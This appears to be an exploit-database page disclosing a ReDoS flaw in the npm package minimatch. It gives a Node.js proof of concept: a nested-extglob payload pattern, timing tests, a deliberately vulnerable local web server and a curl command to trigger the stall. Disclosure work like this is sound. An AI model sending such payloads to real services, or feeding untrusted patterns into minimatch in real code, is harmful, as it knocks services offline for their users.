Vulners
Lucene search
📄 minimatch Denial of Service
=============================================================================================================================================
| # Title : minimatch ReDoS Leading to Event Loop |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.npmjs.com/package/minimatch |
=============================================================================================================================================
[+] Summary : A critical Regular Expression Denial of Service (ReDoS) vulnerability exists in minimatch prior to versions:
10.2.3
9.0.7
8.0.6
7.4.8
6.2.2
5.1.8
4.2.5
3.1.4
The issue arises when nested *() or +() extglobs are converted into JavaScript RegExp objects containing nested unbounded quantifiers, such as: (?:(?:a|b)*)*
These expressions trigger catastrophic backtracking in the V8 JavaScript engine.
A minimal 12-byte pattern: *(*(*(a|b)))
combined with an 18-byte non-matching input string is sufficient to cause minimatch() to stall for over 7 seconds. Slightly increasing nesting depth or input length can escalate execution time to minutes.
This vulnerability is particularly severe because:
It is triggered via the default minimatch() API
No special options are required
The minimum viable exploit pattern is only 12 bytes
Both *() and +() extglobs are affected
[+] POC : npm install [email protected]
import http from 'node:http';
import { minimatch } from 'minimatch';
console.log("--- Starting ReDoS Backtracking Test ---");
const pattern = "*(*(*(a|b)))";
const testBacktracking = (n) => {
const payload = "a".repeat(n) + "z";
const start = performance.now();
minimatch(payload, pattern);
const end = performance.now();
console.log(`[+] Input length (a x ${n}): Took ${(end - start).toFixed(2)}ms`);
};
testBacktracking(15);
testBacktracking(20);
testBacktracking(23);
console.log("\n--- Starting Vulnerable Web Server (Port 3000) ---");
const server = http.createServer((req, res) => {
const url = new URL(req.url, `http://localhost:3000`);
const userPattern = url.searchParams.get('pattern');
const userPath = url.searchParams.get('path');
if (userPattern && userPath) {
console.log(`[!] Processing potentially malicious request...`);
const start = Date.now();
const result = minimatch(userPath, userPattern);
const duration = Date.now() - start;
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ matchResult: result, duration: `${duration}ms` }));
} else {
res.writeHead(200, { 'Content-Type': 'text/plain' });
res.end("Server is running. Send 'pattern' and 'path' parameters to test.");
}
});
server.listen(3000, () => {
console.log("Server is ready! To trigger the DoS, use this curl command:");
console.log('curl "http://localhost:3000/?pattern=*(*(*(a|b)))&path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaz"');
});
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Mar 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8